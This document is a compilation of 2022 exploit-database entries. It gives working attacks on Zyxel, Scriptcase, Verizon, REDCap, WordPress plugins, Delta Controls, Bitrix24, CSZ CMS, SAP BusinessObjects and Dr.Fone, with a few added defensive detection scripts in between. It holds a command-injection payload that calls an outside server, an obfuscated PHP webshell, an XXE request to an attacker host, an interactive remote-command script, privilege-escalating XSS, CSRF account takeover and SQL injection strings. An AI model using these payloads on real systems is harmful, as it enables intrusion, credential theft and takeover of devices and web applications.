# Exploit Title: Zyxel NWA-1100-NH - Command Injection
# Date: 12/4/2022
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://www.zyxel.com/homepage.shtml
# Version: ALL BEFORE 2.12
# Tested on: Linux
# CVE : CVE-2021-4039
# References : https://download.zyxel.com/NWA1100-NH/firmware/NWA1100-NH_2.12(AASI.3)C0_2.pdf , https://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml
HTTP Request :
POST /login/login.html HTTP/1.1
Host: IP_address:8081
Content-Length: 80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http:/IP_address:8081
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://IP_address:8081/login/login.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login
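A defender-side check for this request pattern, added here as an example that is not part of the advisory: it URL-decodes a login POST body and flags shell metacharacters in the `myname` field, the parameter the advisory shows being injected. The sample bodies are constructed for the example; the first one is the advisory's own request body.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies for this example. The first is the injected body from the
# advisory above; the other two are benign logins made up here.
SAMPLE_BODIES = [
    "myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login",
    "myname=admin&mypasswd=Correct%20Horse%20Battery&Submit=Login",
    "myname=alice.smith&mypasswd=p%40ss%21&Submit=Login",
]

# Shell metacharacters a username never legitimately contains. Backticks and $( start
# command substitution; ; | & and line breaks chain commands. The check runs after URL
# decoding, so %60 (`) and %7c (|) are caught as well as their literal forms.
SHELL_META = re.compile(r"[`;|&\r\n]|\$\(")


def decode_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {field: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def find_injection(body: str, fields=("myname",)) -> list:
    """Return (field, metacharacter) pairs for the watched fields that contain shell syntax.

    Only the username field is watched by default: a password field legitimately holds
    arbitrary characters and is not the parameter this advisory reports.
    """
    decoded = decode_form(body)
    hits = []
    for field in fields:
        match = SHELL_META.search(decoded.get(field, ""))
        if match:
            hits.append((field, match.group(0)))
    return hits


def suspicious_indexes(bodies) -> list:
    """Indexes of the bodies that trip the check, for a log-replay style scan."""
    return [i for i, body in enumerate(bodies) if find_injection(body)]


if __name__ == "__main__":
    for i in suspicious_indexes(SAMPLE_BODIES):
        print(f"body {i}: possible command injection {find_injection(SAMPLE_BODIES[i])}")
```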
# Exploit Title: Scriptcase 9.7 - Arbitrary File Upload (getshell)
# Date: 2022-04-08
# Exploit Author: luckyt0mat0
# Vendor Homepage: https://www.scriptcase.net/
# Software Link: https://www.scriptcase.net/download/
# Version: 9.7
# Tested on: Windows Server 2019
# Proof of Concept:
POST /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ HTTP/1.1
Host: 10.50.1.214:8091
Content-Length: 570
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Origin: http://10.50.1.214:8091
Referer: http://10.50.1.214:8091/scriptcase/devel/iface/app_template.php?randjs=MYxlp4xwCiIQBjy
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sales1.scriptcase-_zldp=%2Blf8JBkbzCTGvnrypkRAEoy1%2BVW%2BpJL8Vv42yN%2FS02hog7eXhi2oz9sY2rJ5JXybCaUbPUvRWVc%3D; sales1.scriptcase-_zldt=6206f2cd-57fd-4e1d-99a8-b9a27c7b3421-2; PHPSESSID=be1281e8cde9348d284c3074c9bea53e; sc_actual_lang_samples=en_us
Connection: close
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="jqul_csrf_token"
gZiFUw6nNw84D4euS8RJ3AQLz0o3Bo1Q24Kq1ufcJA8FjRCIeohe0gBZ34hXIW7M
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="files[]"; filename="123.php"
Content-Type: text/html
<?php
error_reporting(0);
$a = rad2deg^(3).(2);
$b = asin^(2).(6);
$c = ceil^(1).(1);
$exp = $a.$b.$c; //assert
$pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET
$pi=$$pi; //$_GET
call_user_func($exp,$pi{0}($pi{1}));
?>
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ--
# Notes:
- PHPSESSID is - be1281e8cde9348d284c3074c9bea53e
- Upload path is - http://x.x.x.:8091/scriptcase/tmp/sc_tmp_upload_{{PHPSESSID}}/123.php
Exploit Title: Verizon 4G LTE Network Extender - Weak Credentials Algorithm
Exploit Author: LiquidWorm
Vendor: Verizon Communications Inc.
Product web page: https://www.verizon.com
Affected version: GA4.38 - V0.4.038.2131
Summary: An LTE Network Extender enhances your indoor and 4G
LTE data and voice coverage to provide better service for your
4G LTE mobile devices. It's an extension of our 4G LTE network
that's placed directly in your home or office. The LTE Network
Extender works with all Verizon-sold 4G LTE mobile devices for
4G LTE data service and HD Voice-capable 4G LTE devices for voice
service. This easy-to-install device operates like a miniature
cell tower that plugs into your existing high-speed broadband
connection to communicate with the Verizon wireless network.
Desc: Verizon's 4G LTE Network Extender uses a weak default
admin password generation algorithm. The password is generated
from the last 4 characters of the device's MAC address, which
is disclosed on the main web UI login page to an unauthenticated
attacker. Those characters are appended to the string
'LTEFemto', giving a default admin password such as
'LTEFemtoD080'.
Tested on: lighttpd-web
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5701
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5701.php
17.02.2022
--
snippet:///Exploit
//
// Verizon 4G LTE Network Extender Super Awesome JS Exploit
//
console.log("Calling 'isDefaultPassword' API");
let req = new Request("/webapi/isDefaultPassword");
let def = req.url;
const doAjax = async () => {
const resp = await fetch(def);
if (resp.ok) {
const jsonyo = await resp.json();
return Promise.resolve(jsonyo);
} else {
return Promise.reject("Smth not rite captain!");
}
}
doAjax().then(console.log).catch(console.log);
await new Promise(t => setTimeout(t, 1337));
console.log("Verizon Admin Password: ");
let mac = document.querySelector("#mac_address").innerHTML;
console.log("LTEFemto" + mac.substr(-4));
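An inventory audit for this weakness, added here as an example and not part of the advisory or the snippet above: it reproduces the derivation the advisory describes ('LTEFemto' plus the last four hex characters of the MAC; upper case is assumed from the advisory's 'LTEFemtoD080' example) so that extenders still using the factory-derived admin password can be listed. The inventory records are constructed.

```python
import re

DEFAULT_PREFIX = "LTEFemto"


def normalize_mac(mac: str) -> str:
    """Strip separators and upper-case a MAC: '00:11:22:33:d0:80' -> '00112233D080'."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return digits.upper()


def derive_default_password(mac: str) -> str:
    """The advisory's derivation: prefix + last four hex characters of the MAC.

    Upper case is an assumption taken from the advisory's 'LTEFemtoD080' example.
    """
    return DEFAULT_PREFIX + normalize_mac(mac)[-4:]


def is_default_password(password: str, mac: str) -> bool:
    """True when the configured admin password is the factory-derived value.

    Compared case-insensitively so a trivially re-cased variant is still flagged.
    """
    return password.lower() == derive_default_password(mac).lower()


def default_keyspace_size() -> int:
    """Candidates to try even without the MAC: four hex characters, 16**4 values."""
    return 16 ** 4


def audit(devices) -> list:
    """devices: iterable of (name, mac, configured_password); returns names still on the default."""
    return [name for name, mac, password in devices if is_default_password(password, mac)]


# Constructed inventory for this example; MACs and passwords are made up.
SAMPLE_DEVICES = [
    ("extender-lobby", "00:11:22:33:d0:80", "LTEFemtoD080"),
    ("extender-office", "00-11-22-33-AB-CD", "Correct-Horse-Battery-Staple"),
    ("extender-lab", "001122334455", "ltefemto4455"),
]

if __name__ == "__main__":
    print("still on the factory-derived password:", audit(SAMPLE_DEVICES))
```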
# Exploit Title: WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
# Date: 2022-04-13
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: http://www.a-j-evolution.com/
# Software Link: https://downloads.wordpress.org/plugin/video-synchro-pdf.1.7.4.zip
# Category: Web Application
# Version: 1.7.4
# Tested on: CentOS / WordPress 5.9.3
# CVE : N/A
# 1. Technical Description:
The plugin does not properly sanitize the nom, pdf, mp4, webm and ogg parameters, allowing
potentially dangerous characters to be inserted. This includes the reported payload, which
triggers a persistent Cross-Site Scripting (XSS).
# 2. Proof of Concept (PoC):
a. Install and activate version 1.7.4 of the plugin.
b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=aje_videosyncropdf_videos).
c. Open the "Video example" or create a new one (whichever you prefer).
d. Change or add the following payload in any of the displayed fields (Name, PDF file, MP4 video, WebM video or OGG video):
" autofocus onfocus=alert(/XSS/)>
e. Save the changes with the "Edit" button.
f. JavaScript will be executed and a popup with the text "XSS" will be displayed.
Note: This change will be permanent until you modify the edited field.
# Exploit Title: ManageEngine ADSelfService Plus 6.1 - User Enumeration
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: ADSelfService 6.1 Build 6121
# Tested Against: Build 6118 - 6121
# Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
#!/usr/bin/python3
import requests
import sys
import time
import urllib3
from urllib3.exceptions import InsecureRequestWarning
"""
Domain users can be enumerated with this exploit, much like the userenum module of the kerbrute tool.
If you conducted a brute-force attack against a user, run the script after 30 minutes (default settings); otherwise the results can be false positives.
"""


def request(target, user):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    url = target + 'ServletAPI/accounts/login'
    data = {"loginName": user}
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}
    req = requests.post(url, data=data, headers=headers, verify=False)
    # For debugging
    # print("[*] Response for " + user + ": " + req.text.strip())
    # The response text differs per account state, which is the enumeration oracle.
    if 'PASSWORD' in req.text:
        print("[+] " + user + " is VALID!")
    elif 'Your account has been disabled' in req.text:
        print("[+] " + user + " account has been DISABLED.")
    elif 'Your account has expired' in req.text:
        print("[+] " + user + " account has EXPIRED.")
    elif 'Enter the text as shown in the image.' in req.text:
        print("[!] The exploit doesn't detect expired and disabled users. Please, run it after the 30 minutes. ")
    elif 'Permission Denied.' in req.text:
        print("[-] " + user + " is not found.")


def get_users(target, file):
    try:
        with open(file, "r") as fh:
            for line in fh:
                line = line.strip()
                time.sleep(0.5)
                request(target, user=line)
    except FileNotFoundError:
        print("[-] File not found!")
        sys.exit(1)


def main(args):
    if len(args) != 3:
        print("[*] Usage: %s url usernames_file" % (args[0]))
        print("[*] Example: %s https://target/ /tmp/usernames.txt" % (args[0]))
        sys.exit(1)
    get_users(target=args[1], file=args[2])


if __name__ == "__main__":
    main(args=sys.argv)
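The script above works because the login endpoint answers differently for valid, disabled, expired and unknown accounts; the fix on the server side is a uniform response plus rate limiting, and the activity is also visible in access logs. The following detector, added here as an example and not part of the advisory, counts distinct loginName values per source IP in a sliding window over constructed log lines (combined-format lines with the loginName field appended, as a front-end proxy could be configured to log).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Constructed log lines for this example (not real traffic): combined-log style with the
# POST body's loginName appended as a final field by the front-end proxy.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Apr/2022:10:00:01 +0000] "POST /ServletAPI/accounts/login HTTP/1.1" 200 512 loginName=jsmith
10.0.0.5 - - [25/Apr/2022:10:00:02 +0000] "POST /ServletAPI/accounts/login HTTP/1.1" 200 498 loginName=mjones
10.0.0.5 - - [25/Apr/2022:10:00:02 +0000] "POST /ServletAPI/accounts/login HTTP/1.1" 200 498 loginName=rlee
10.0.0.5 - - [25/Apr/2022:10:00:03 +0000] "POST /ServletAPI/accounts/login HTTP/1.1" 200 512 loginName=kwong
10.0.0.5 - - [25/Apr/2022:10:00:04 +0000] "POST /ServletAPI/accounts/login HTTP/1.1" 200 498 loginName=admin
10.0.0.5 - - [25/Apr/2022:10:00:04 +0000] "POST /ServletAPI/accounts/login HTTP/1.1" 200 498 loginName=svc_backup
10.0.0.9 - - [25/Apr/2022:10:00:10 +0000] "POST /ServletAPI/accounts/login HTTP/1.1" 200 512 loginName=alice
10.0.0.9 - - [25/Apr/2022:10:01:30 +0000] "POST /ServletAPI/accounts/login HTTP/1.1" 200 512 loginName=alice
10.0.0.9 - - [25/Apr/2022:10:02:45 +0000] "POST /ServletAPI/accounts/login HTTP/1.1" 200 512 loginName=alice
10.0.0.7 - - [25/Apr/2022:10:03:00 +0000] "GET /webclient/index.html HTTP/1.1" 302 0 -
10.0.0.7 - - [25/Apr/2022:10:03:05 +0000] "POST /ServletAPI/accounts/login HTTP/1.1" 200 512 loginName=bob
10.0.0.7 - - [25/Apr/2022:10:03:06 +0000] "POST /ServletAPI/accounts/login HTTP/1.1" 200 512 loginName=bob.smith
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ (?P<extra>.*)$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/ServletAPI/accounts/login"


def parse_line(line: str):
    """Parse one log line into a dict, or None when it does not match the expected shape."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["login_name"] = parse_qs(rec["extra"]).get("loginName", [None])[0]
    return rec


def find_enumeration(log_text: str, window=timedelta(seconds=60), threshold=5) -> dict:
    """Return {ip: max distinct loginName count in any `window`} for IPs at or above `threshold`.

    A real user retrying one account produces one distinct name; enumeration from a
    wordlist produces many names in a short time, whatever the server answered.
    """
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] != LOGIN_PATH or not rec["login_name"]:
            continue
        attempts[rec["ip"]].append((rec["ts"], rec["login_name"]))

    flagged = {}
    for ip, events in attempts.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:  # slide the window forward
                start += 1
            distinct = len({name for _, name in events[start:end + 1]})
            if distinct >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), distinct)
    return flagged


if __name__ == "__main__":
    for ip, count in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {count} distinct login names within 60s -> possible user enumeration")
```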
# Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting
# Date: 2021-10-11
# Exploit Author: Kendrick Lam
# References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js
# Vendor Homepage: https://projectredcap.org
# Software Link: https://projectredcap.org
# Version: Redcap before 11.4.0
# Tested on: 11.2.5
# CVE: CVE-2021-42136
# Security advisory: https://redcap.med.usc.edu/_shib/assets/ChangeLog_Standard.pdf
### Stored XSS – Missing Data Code Value (found by Kendrick Lam)
It was possible to store JavaScript as values for Missing Data Codes.
- Where: Missing Data Code.
- Payload:
<script>
var target = document.location.host;
var csrf_token = csrf_token;
var userId = '<userId>'; // Replace with your user ID.
function privesc()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://" + target + "/index.php?route=ControlCenterController:saveNewAdminPriv", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Sec-Fetch-Dest", "empty");
xhr.withCredentials = "true";
var body = "";
body += "userid=" + userId + "&attrs=admin_rights%2Csuper_user%2Caccount_manager%2Caccess_system_config%2Caccess_system_upgrade%2Caccess_external_module_install%2Caccess_admin_dashboards&csrf_token=" + csrf_token;
xhr.send(body);
return true;
}
privesc();
</script>
- Details: The payload will escalate a regular user's privileges, if viewed by an account with permission to change privileges (such as an administrator).
- Privileges: Low privileged / regular user
- Location example: https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
- Privileges:
+ Store: Low privileged user is able to store Missing Data Code values.
+ Execute: Any authenticated user. The payload triggers as soon as the page loads, so storing the payload and sending the link to an administrator is enough to escalate the user's privileges. For example, by browsing to https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
# Exploit Title: WordPress Plugin Popup Maker <1.16.5 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2022-03-03
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://wppopupmaker.com
# Software Link: https://downloads.wordpress.org/plugin/popup-maker.1.16.4.zip
# Version: <1.16.5
# Tested on: WordPress 5.9 on Ubuntu 20.04
1. Description:
----------------------
WordPress Plugin Popup Maker <1.16.5 does not sanitise and escape some of its popup settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
2. Proof of Concept:
----------------------
Create Popup > Popup Settings > Triggers > Add New Cookie > Add > Cookie Time (overwrite the default '1 month' with the XSS payload)
Click 'Add', which triggers the XSS payload.
Payload examples:
<script>alert('XSS');</script>
<img src=x onerror=alert('XSS')>
# Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
# Exploit Author: LiquidWorm
<!DOCTYPE html>
<html>
<head><title>enteliTouch XSS</title></head>
<body>
<!--
Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)
Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
3.40.3706
3.33.4005
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.
Desc: Input passed to the POST parameter 'Username' is not properly
sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML code in a user's browser session in context
of an affected site.
Tested on: DELTA enteliTOUCH
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5703
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php
06.04.2022
-->
<form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST">
<input type="hidden" name="userInfo" value="" />
<input type="hidden" name="UL_SelectedOptionId" value="" />
<input type="hidden" name="Username" value=""></script><script>alert(document.cookie)</script>" />
<input type="hidden" name="formAction" value="Delete" />
<input type="submit" value="CSRF XSS Alert!" />
</form>
</body>
</html>
# Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
# Exploit Author: LiquidWorm
<!DOCTYPE html>
<html>
<head><title>enteliTouch CSRF</title></head>
<body>
<!--
Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF)
Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
3.40.3706
3.33.4005
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: DELTA enteliTOUCH
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5702
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5702.php
06.04.2022
-->
CSRF Add User:
<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Add&userName=&userPassword=" method="POST">
<input type="hidden" name="actionName" value="" />
<input type="hidden" name="Username" value="zsl" />
<input type="hidden" name="Password" value="123t00t" />
<input type="hidden" name="AutoLogout" value="17" />
<input type="hidden" name="SS_SelectedOptionId" value="FIL28" />
<input type="hidden" name="ObjRef" value="" />
<input type="hidden" name="Apply" value="true" />
<input type="hidden" name="formAction" value="Add" />
<input type="submit" value="Go for UserAdd" />
</form>
<br />
CSRF Change Admin Password (default: delta:login):
<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST">
<input type="hidden" name="actionName" value="" />
<input type="hidden" name="Username" value="DELTA" />
<input type="hidden" name="Password" value="123456" />
<input type="hidden" name="AutoLogout" value="30" />
<input type="hidden" name="SS_SelectedOptionId" value="" />
<input type="hidden" name="ObjRef" value="ZSL-251" />
<input type="hidden" name="Apply" value="true" />
<input type="hidden" name="formAction" value="Edit" />
<input type="submit" value="Go for UserEdit" />
</form>
</body>
</html>
# Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated)
# Date: 4/22/2022
# Exploit Author: picaro_o
# Vendor Homepage: https://www.bitrix24.com/apps/desktop.php
# Tested on: Linux os
#!/usr/bin/env python
# Created by heinjame
import requests
import re
from bs4 import BeautifulSoup
import argparse
import sys

user_agent = {'User-agent': 'HeinJame'}
parser = argparse.ArgumentParser()
parser.add_argument("host", help="Bitrix URL")
parser.add_argument("uname", help="Bitrix Username")
parser.add_argument("pass", help="Bitrix Password")
pargs = parser.parse_args()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
inputcmd = input(">>")
s = requests.Session()


def login():
    postdata = {'AUTH_FORM': 'Y', 'TYPE': 'AUTH', 'backurl': '%2Fstream%2F', 'USER_LOGIN': username, 'USER_PASSWORD': password}
    r = s.post(url + "/stream/?login=yes", headers=user_agent, data=postdata)
    # print(r.text)


def getsessionid():
    # The admin PHP console page embeds the session id as 'bitrix_sessid': '<value>'
    sessionid = s.get(url + "bitrix/admin/php_command_line.php?lang=en", headers=user_agent)
    session = re.search(r"'bitrix_sessid':.*", sessionid.text)
    extract = session.group(0).split(":")
    realdata = extract[1].strip(" ")
    realdata = realdata.replace("'", "")
    realdata = realdata.replace(",", "")
    return realdata


def cmdline(cmd, sessionid):
    cmdline = {'query': "system('" + cmd + "');", 'result_as_text': 'n', 'ajax': 'y'}
    usercmd = s.post(url + "bitrix/admin/php_command_line.php?lang=en&sessid=" + sessionid, headers=user_agent, data=cmdline)
    soup = BeautifulSoup(usercmd.content, 'html.parser')
    cmd = soup.find('p').getText()
    print(cmd.rstrip())


login()
sessionid = getsessionid()
while inputcmd != "exit":
    cmdline(inputcmd, sessionid)
    inputcmd = input(">>")
Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure
Exploit Author: LiquidWorm
Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
3.40.3706
3.33.4005
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.
Desc: The application suffers from a cleartext transmission/storage
of sensitive information in a Cookie. This allows a remote
attacker to intercept the HTTP Cookie authentication credentials
through a man-in-the-middle attack.
Tested on: DELTA enteliTOUCH
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5704
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5704.php
06.04.2022
--
GET /deltaweb/hmi_useredit.asp?ObjRef=BAC.1000.ZSL3&formAction=Edit HTTP/1.1
Host: 192.168.0.210
Cache-Control: max-age=0
User-Agent: Toucher/1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.210/deltaweb/hmi_userconfig.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Previous=; lastLoaded=; LastUser=DELTA; LogoutTime=10; UserInstance=1; UserName=DELTA; Password=LOGIN; LastGraphic=; LastObjRef=; AccessKey=DADGGEOFNILEJMBBCNDKFNJPHPPJDAEDGEBJACPEAPBHDCGPCAGNNDEOJIJEOPPLOEKCFMAFNHDJPHGACMDFMPFDNONPIJAHBBNAAIDMDHCCPMAJDELDNLOPBPDCKELJADDKICPMMPCNEOMBHMKIIBJHFAJKNKJFGDEOLPMGMNBEHFLNEDIFMJKMCJKBHPGGEMHJJGMOMAECDKDIIKGNDDGANIHDKPNACLMANGJAOBDNJCFGEIHIJICLPGOFFMDOOLOJCJPAPPKOJFCKFAHDDAGNLCAHKKKGHCBODHBNDCOECGHG
Connection: close
# Exploit Title: CSZ CMS 1.3.0 - 'Multiple' Blind SQLi
# Date: 2021-04-22
# Exploit Author: Dogukan Dincer
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
# Version: 1.3.0
# Tested on: Kali Linux, Windows 10, PHP 7.2.4, Apache 2.4
# Discovery of Vulnerability
- First, go to the CSZ CMS web page.
- Then go to the http://yourhost/plugin/article directory on the CMS.
- To see the error-based SQLi vulnerability, enter the ' character in the search field.
- The "p" parameter is the one that triggers the vulnerability.
- Databases can be accessed with manual or automated tools.
# Proof of Concept
http://127.0.0.1/csz-cms/plugin/article/search?p=1'") UNION ALL SELECT CONCAT(0x717a7a6b71,0x5449414d6c63596c746759764a614d64727476796366686f4e6a7a474c4a414d6b616a4269684956,0x716a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
# Sqlmap output:
Parameter: p (GET)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: p=1'") AND EXTRACTVALUE(8555,CONCAT(0x5c,0x717a7a6b71,(SELECT (ELT(8555=8555,1))),0x716a717a71))-- OUUO
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=1'") AND (SELECT 3910 FROM (SELECT(SLEEP(5)))qIap)-- ogLS
# Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
# Google Dork: N/A
# Date: 4/21/2022
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.sap.com/
# Software Link: https://www.sap.com/
# Version: 4.2 and 4.3
# Tested on: Windows Server 2019 x64
# CVE : CVE-2022-28213
# References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md
curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \
--data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY %
remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \
https://example.com/biprws/logon/long
# Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
# Date: 04/25/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://drfone.wondershare.com/
# Software Link: https://download.wondershare.com/drfone_full3360.exe
# Version: 11.4.10
# Tested on: Windows 10 64-bit
# Note: The application folder "Wondershare Dr.Fone" may differ (e.g. it will be "drfone" if the installer is downloaded from the Italian website)
# Description:
The application "Wondershare Dr. Fone" comes with 3 services:
1. DFWSIDService
2. ElevationService
3. Wondershare InstallAssist
All the folders that contain the binaries for the services have weak permissions.
These weak permissions allow any authenticated user to get SYSTEM privileges.
First, we need to check if services are running using the following command:
wmic service get name,displayname,pathname,startmode,startname,state | findstr /I wondershare
Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto LocalSystem Running
Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps\ElevationService.exe Auto LocalSystem Running
Wondershare Install Assist Service Wondershare InstallAssist C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto LocalSystem Running
Now we need to check if we have enough privileges to replace the binaries:
icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone"
Everyone:(OI)(CI)(F) <= the first row tells us that Everyone has Full Access (F) on files (OI = Object Inherit) and folders (CI = Container Inherit)
...
icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps"
Everyone:(I)(OI)(CI)(F) <= same here
...
icacls "C:\ProgramData\Wondershare\Service"
Everyone:(I)(OI)(CI)(F) <= and here
...
# Proof of Concept:
1. Create an exe file with the name of the binary we want to replace (e.g. WsidService.exe if we want to exploit the service "Wondershare WSID help")
2. Put it in the folder (e.g. C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\)
3. After replacing the binary, wait for the next reboot (unless the service can be restarted manually)
As a proof of concept we can generate a simple reverse shell using msfvenom, and use netcat as the listener:
